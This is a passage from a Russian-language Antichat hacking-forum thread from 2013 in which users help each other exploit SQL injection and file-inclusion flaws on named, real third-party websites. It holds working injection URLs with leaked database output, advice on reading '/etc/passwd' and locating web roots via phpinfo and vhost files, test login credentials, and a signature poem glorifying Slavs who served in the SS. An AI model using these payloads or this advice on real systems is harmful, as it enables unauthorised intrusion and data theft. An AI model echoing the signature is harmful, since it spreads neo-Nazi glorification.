 |
|
06.06.2013, 00:50
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от stan_q
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается?
load_file('/etc/passwd')
так иногда можно через скулю путь посмотреть
|
|
|
06.06.2013, 01:14
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Сообщение от er9j6@
load_file('/etc/passwd')
так иногда можно через скулю путь посмотреть
Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/
ЗЫ Почему-то при написании в адресной строке браузера load_file('/etc/passwd') сайт подвисает, а если захексить - то все норм. И такое на всех сайтах и всех основных браузерах...
|
|
|
|
06.06.2013, 01:18
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от stan_q
Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/
Тогда в базе поищи, например у Joomla в таблице jos_session и колонка data путь прописан
|
|
|
|
06.06.2013, 20:20
|
|
Новичок
Регистрация: 07.01.2013
Сообщений: 19
С нами:
7023926
Репутация:
5
|
|
подскажите, это инъекция? в конце fid
Сообщение от None
http://onlineracer.softgames.de/softgames/mobile/index_softgames.php?token=8EFCF9FAD3B2A421038C4CE2 FB2DC0C7&sig=D8849E4E00B50E2E120D56366B072D1E&api_ id=2446802&referrer=user_apps&method=getenemygarag e&fid=1'
(пробелы убрать)
если да, то как от туда данные вытащить? пробовал, не получается |
|
|
|
06.06.2013, 21:16
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от stan_q
Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/
дальше и на угад можно, ведь не такуж и много вариантов, советую почитать
http://mh-proxy.ru/blog/index.php?mod=read&id=15
Сообщение от LomasterII
подскажите, это инъекция? в конце fid
(пробелы убрать)
если да, то как от туда данные вытащить? пробовал, не получается
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//onlineracer.softgames.de/softgames/mobile/index_softgames.php?token=8EFCF9FAD3B2A421038C4CE2FB2DC0C7&sig=D8849E4E00B50E2E120D56366B072D1E&api_id=2446802&referrer=user_apps&method=getenemygarage&fid=1+and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%281%29=%201[/COLOR][/COLOR]
column name '5.1.63-0+squeeze1-log''
|
|
|
|
07.06.2013, 00:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от stan_q
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.
пытайся найти phpinfo
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
07.06.2013, 22:22
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
С нами:
8738995
Репутация:
1
|
|
Сообщение от stan_q
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.
1)Попробуй
/etc/httpd/vhosts/default.conf
/etc/httpd/vhosts/(домен).conf
2)Прогони сканером директорий на стандартные пути к файлу с phpinfo(); (часто оставляют в корне web директории что-нибудь типа info.php, phpinfo.php, 1.php, и так далее) . там можно будет прочитать путь.
3) Посмотри что еще за сайты на сервере (можно здесь http://madnet.name/tools/madss/ ), спровоцируй ошибку на других доменах, так же попробуй найти на них пхпинфо, по шаблону подобрать путь к основной жертве.
|
|
|
|
08.06.2013, 10:33
|
|
Участник форума
Регистрация: 17.08.2011
Сообщений: 131
С нами:
7756886
Репутация:
0
|
|
testvanieva.kz/login.php?language=../index
дальше можно как-нибудь?
|
|
|
|
11.06.2013, 01:03
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
Сообщение от None
http://copywri[delete]terbox.com/announcement.php?id=4+and+5=5
http://copyw[delete]riterbox.com/article.php?id=25+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18--
Кто может раскрутить это не блайндом а чтобы вывод был нормальный ? Там походу какойто фильтр на union
Для авторизации trol@mailforspam.com:123456
|
|
|
|
15.06.2013, 02:03
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
del/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
